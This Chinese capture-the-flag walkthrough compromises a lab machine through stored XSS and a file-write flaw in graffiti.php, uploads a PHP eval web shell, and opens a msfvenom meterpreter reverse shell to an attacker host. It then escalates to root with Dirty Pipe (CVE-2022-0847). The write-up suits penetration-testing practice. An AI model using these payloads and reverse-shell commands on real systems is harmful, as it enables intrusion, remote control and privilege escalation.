目录

<1> 信息收集

<2> getshell

 <3> Privilege Escalation（提权）

---

<1> 信息收集

nmap -sP 192.168.236.0/24 扫描一下靶机ip

靶机ip: 192.168.236.154

nmap -A -p 1-65535 192.168.236.154 扫描一下靶机开放哪些服务

开放了22端口的ssh服务和 80、81的http服务

 访问一下 80 端口，提示 ssh用户都锁了，应该是无法利用   81端口是个登录服务

 扫一下目录 扫出来了 graffiti.txt和 graffiti.php  

graffiti.php存在一个输入框

输入 aaaa 发现他会显示在前端界面

输入 <script>alert('xss')</script> 试着xss 成功弹框 存在存储型xss漏洞

直接传入  <script language='php'>eval($_POST['a'])</script> 并无效果

但是我们再次访问 graffiti.txt时发现 我们在graffiti.php post的message参数都写入了其中

抓一下post包

  发现存在file参数，我们更改file为 test.php 

写入一句话木马，成功写入

<2> getshell

 写入成功后 蚁剑连接

/home下发现了cypher、trinity 两个用户

根目录下发现了 flag但是没有权限

尝试 suid提权，没有可利用的

find / -perm -u=s -type f 2>/dev/null 

 <3> Privilege Escalation（提权）

利用msf的提权辅助模块来提权

使用 msf监听模块 exploit/multi/handler 开个监听

 msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.236.128 lport=4444 -f elf > shell.elf

利用msfvenom 生成木马文件 上传到靶机上的 /tmp目录下

msf开启监听之后，运行 ./shell.elf

得到会话

 background 回到 msf  

search 找本地提权的辅助模块

 options 设置所需的参数，设置好之后 run

找到了  exploit/linux/local/cve_2022_0847_dirtypipe

执行linpeas.sh也可以 查询

 或者本地上传对应 ./linux-exploit-suggester.sh

这里利用 CVE-2022-0847

设置好对应参数  run 

 

 成功返回了 会话2  可见 提权成功

 cd /root目录下 cat FLAG.txt 得到flag